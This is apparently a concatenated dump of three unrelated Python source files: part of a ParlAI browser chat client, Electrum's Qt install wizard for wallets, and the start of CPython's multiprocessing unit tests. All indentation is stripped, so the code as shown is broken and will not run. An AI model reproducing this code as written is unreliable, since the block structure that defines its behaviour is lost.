elif self.path == '/reset':
self._interactive_running(b"[RESET]")
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes("{}", 'utf-8'))
message_available.wait()
message_available.clear()
else:
return self._respond({'status': 500})
def do_GET(self):
"""
Respond to GET request, especially the initial load.
"""
paths = {
'/': {'status': 200},
'/favicon.ico': {'status': 202},  # Needed for Chrome
}
if self.path in paths:
self._respond(paths[self.path])
else:
self._respond({'status': 500})
def _handle_http(self, status_code, path, text=None):
self.send_response(status_code)
self.send_header('Content-type', 'text/html')
self.end_headers()
content = WEB_HTML.format(STYLE_SHEET, FONT_AWESOME)
return bytes(content, 'UTF-8')
def _respond(self, opts):
response = self._handle_http(opts['status'], self.path)
self.wfile.write(response)
def on_message(ws, message):
"""
Store the incoming message from the server and signal the waiting HTTP handler.
:param ws: a WebSocketApp
:param message: json with a 'text' field holding the model reply
"""
incoming_message = json.loads(message)
global new_message
new_message = incoming_message['text']
message_available.set()
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("Connection closed")
def _run_browser():
host = opt.get('host', 'localhost')
serving_port = opt.get('serving_port', 8080)
httpd = HTTPServer((host, serving_port), BrowserHandler)
print('Please connect to the link: http://{}:{}/'.format(host, serving_port))
SHARED['wb'] = httpd
httpd.serve_forever()
def on_open(ws):
"""
Start the thread that serves the browser chat UI once the websocket connection is open.
:param ws: websocket.WebSocketApp that sends messages to a browser_manager
"""
threading.Thread(target=_run_browser).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Browser Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port used by the web socket (run.py)'
)
parser_grp.add_argument(
'--host',
default='localhost',
type=str,
help='Host from which to allow requests; use 0.0.0.0 to allow all IPs',
)
parser_grp.add_argument(
'--serving_port',
default=8080,
type=int,
help='Port used to configure the server',
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 34596)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
setup_interactive(ws)
ws.run_forever()
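# Hedged usage note (not part of the original script): the matching ParlAI
# websocket server is expected to be running first, on the same --port given
# here; the chat UI is then served by _run_browser at
# http://<host>:<serving_port>/ (http://localhost:8080/ with the defaults).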
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
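# Decorator for wizard step methods: it relabels the Back button, runs the
# wrapped dialog, feeds its return value(s) into run_next, and on GoBack either
# steps back through the wizard or closes it and re-raises.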
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
run_next(*out)
except GoBack:
if wizard.can_go_back():
wizard.go_back()
return
else:
wizard.close()
raise
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins'):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = WWLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path, manual_upgrades=True)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
self.msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
self.name_e.setText,
get_new_wallet_name(wallet_folder)))
self.name_e.textChanged.connect(on_filename)
self.name_e.setText(os.path.basename(path))
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import gc
import signal
import array
import copy
import socket
import random
import logging
# Work around broken sem_open implementations
try:
import multiprocessing.synchronize
except ImportError, e:
from test.test_support import TestSkipped
raise TestSkipped(e)
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
import _multiprocessing
from multiprocessing import util
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.WARNING
DELTA = 0.1
CHECK_TIMINGS = False # setting this to True makes the tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
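# Illustrative example (not part of the test suite):
#   wait = TimingWrapper(time.sleep)
#   wait(0.2)             # returns whatever the wrapped callable returns
#   print wait.elapsed    # roughly 0.2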
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertTrue(isinstance(authkey, bytes))
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertTrue(p not in self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.active_children())
p.start()
self.assertTrue(p in self.active_children())
p.join()
self.assertTrue(p not in self.active_children())
def _test_recursion(self, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
